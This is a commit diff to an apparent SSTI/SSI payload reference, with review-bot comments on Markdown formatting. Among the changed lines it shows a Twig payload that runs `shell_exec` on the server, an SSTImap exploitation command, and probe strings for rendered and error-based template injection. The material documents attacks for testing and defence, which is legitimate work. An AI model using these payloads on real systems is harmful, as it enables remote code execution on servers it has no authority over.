SSI, SSTI:

- Improved MarkDown
vladko312 2026-01-03 22:20:19 +03:00
parent 4831e36fb8
commit 09a5f07345
4 changed files with 9 additions and 8 deletions

View file

@ -11,7 +11,7 @@
## Tools
- [vladko312/SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [epinna/tplmap](https://github.com/epinna/tplmap), supports SSI detection and exploitation with `--legacy` or `-e SSI`
* [vladko312/SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [epinna/tplmap](https://github.com/epinna/tplmap), supports SSI detection and exploitation with `--legacy` or `-e SSI`
```bash
python3 ./sstimap.py -u 'https://example.com/page?name=John' --legacy -s
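Review bot: The example command under the changed Tools item passes `-s`, but the item text only explains `--legacy` and `-e SSI`. Since this line is being touched anyway, add a few words on what `-s` does so the example can be read without opening the tool's help. The two versions of the list item otherwise differ only in the bullet marker, which is fine.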

View file

@ -54,7 +54,7 @@
### Java EL - Basic Injection
> Java has multiple Expression Languages using similar syntax.
Java has multiple Expression Languages using similar syntax.
> Multiple variable expressions can be used, if `${...}` doesn't work try `#{...}`, `*{...}`, `@{...}` or `~{...}`.
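Review bot: Only the first line of the Java EL note loses its `>` marker; the following line ("Multiple variable expressions can be used...") still starts with `>`. The note is now split between a plain paragraph and a blockquote. Either drop the `>` from both lines or keep it on both, and leave a blank line between the paragraph and whatever follows so the rendering does not depend on how the parser treats a blockquote directly after text.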

View file

@ -167,6 +167,7 @@ $output = $twig > render (
```
With certain settings, Twig interrupts rendering, if any errors or warnings are raised. This payload works fine in these cases:
```php
{{ {'id':'shell_exec'}|map('call_user_func')|join }}
```
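Review bot: The fence around `{{ {'id':'shell_exec'}|map('call_user_func')|join }}` is tagged `php`, but the content is a Twig template expression, so a `twig` tag would highlight it correctly and match what the sentence above describes. While editing here, "With certain settings" could name the Twig setting that makes rendering stop on errors or warnings, and the comma after "interrupts rendering" can go.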

View file

@ -53,9 +53,9 @@
Original research:
- Rendered, Time-Based: [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://portswigger.net/knowledgebase/papers/serversidetemplateinjection.pdf)
- Polyglot-Based: [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf)
- Error-Based, Boolean-Based: [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
* Rendered, Time-Based: [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://portswigger.net/knowledgebase/papers/serversidetemplateinjection.pdf)
* Polyglot-Based: [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf)
* Error-Based, Boolean-Based: [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
#### Rendered
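Review bot: The three "Original research" entries change only their list marker from `-` to `*`, and the commit message ("Improved MarkDown") does not say which convention is being adopted. State the chosen marker in the commit message or the contributing notes, and ideally enforce it with the repository's Markdown lint configuration. Otherwise the next contribution can reintroduce `-` and the files drift apart again.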
@ -117,7 +117,7 @@ ${{<%[%'"}}%\.
Common tags to test for SSTI with code evaluation:
```
```powershell
{{ ... }}
${ ... }
#{ ... }
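Review bot: The fence holding the tag list (`{{ ... }}`, `${ ... }`, `#{ ... }`) is now tagged `powershell`, but these are template delimiters from several engines, not PowerShell. The tag will make highlighters colour `${ ... }` as a PowerShell variable and misleads readers about the context. If the goal is to give every fence a language, `text` is the accurate choice here.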
@ -133,13 +133,13 @@ ${ ... }
Rendered SSTI can be checked by using mathematical expressions inside the tags:
```
```powershell
7 * 7
```
Error-Based SSTI can be checked by using this payload inside the tags:
```
```powershell
(1/0).zxy.zxy
```
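Review bot: Both fences in this hunk, the one around `7 * 7` and the one around `(1/0).zxy.zxy`, gain a `powershell` tag although the surrounding text says the expressions go inside template tags of whichever engine is being tested. Use `text` for both. A sentence after each check saying what response separates an evaluated expression from one echoed back literally would also make these two checks usable as documentation.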